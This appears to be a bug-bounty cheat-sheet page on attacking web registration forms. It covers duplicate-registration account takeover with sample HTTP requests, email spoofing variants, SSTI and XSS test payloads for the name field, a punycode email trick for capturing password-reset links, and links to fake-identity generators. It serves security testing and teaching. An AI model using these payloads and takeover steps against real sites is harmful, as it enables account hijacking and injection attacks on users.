Registration Form

Registration Form Exploit

Business Logic

Try to register with the email example@target.com. Sometimes these accounts have special privileges such as no rate limiting and bypass certain verifications.

Impersonation

Register twice using the same data but changing the sign-up component.

The victim’s account could be hijacked if the application allows resetting the password based on one of the sign-up components.

Duplicate Registration - The Twinning TwinsMedium

POST /newaccount HTTP/1.1
...
email=victim@mail.com&password=1234

After sign up using victim email, try signup again but using different password

POST /newaccount HTTP/1.1
...
email=victim@mail.com&password=hacked

The attacker may impersonate the victim by using his data from another account.
The victim’s data can be removed entirely from the database or replaced with new ones entered by the attacker.

Username and other sensitive data such as document number, phone number, personal identification number, International Bank Account Number, etc., must be linked to the existing account and blocked from being used again.

Spoofing

Register twice using: the same email | + |. |uppercase|unicode.

The attacker could smuggle messages to the victim based on the registration form, which could help in a phishing campaign.
A victim’s mailbox can be flooded with vast amounts of email messages. Asa result, the mail server can place messages from the target domain in the spam or block them entirely from delivery.
An attacker could get registration bonuses multiple times.

SSTI

In name field:

"{{7*7}}<img>
"">{{7*7}}<img>"

XSS

{{constructor.constructor('alert(`XSS`)')()}}

An unusual way to find XSS injection in one minuteMedium

Punny Code Attack

Puny-Code Vulnerabilities & Account TakeoverVoorivex's Team

Create an account, append your collaborator at the end to receive SMTP callback

admin@wearehackerone.com.collaborator.com

scripts/punycode_gen.py at main · coffinxp/scriptsGitHub

admin@weàrehackerone.com.collaborator.com

Burp automatically encode the puny code -> Intercept the request and change the email field manually

"Email already exists" -> The app is vulnerable

Forgot password: Reset the password with the punycode email address. Again intercept the request and change the field in the request, use the puny code

You should get a SMTP callback with the reset password link - Reset the password

Source: https://www.youtube.com/watch?v=Cj1sOFHDClM

Fake Informations

OpSec / Anonymity

Akto Developer Security Free Tools

Username

Username Generator | Random Username Generator - Akto Free Tool

Phone

Phone number Generator | Phone Number Creator - Akto Free Tool

Receive SMS

Receive SMS online for free

Address

Address Generator | Random Address Generator - Akto Tools

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousBypass 302 NextEmail Verification Bypass

Last updated 1 month ago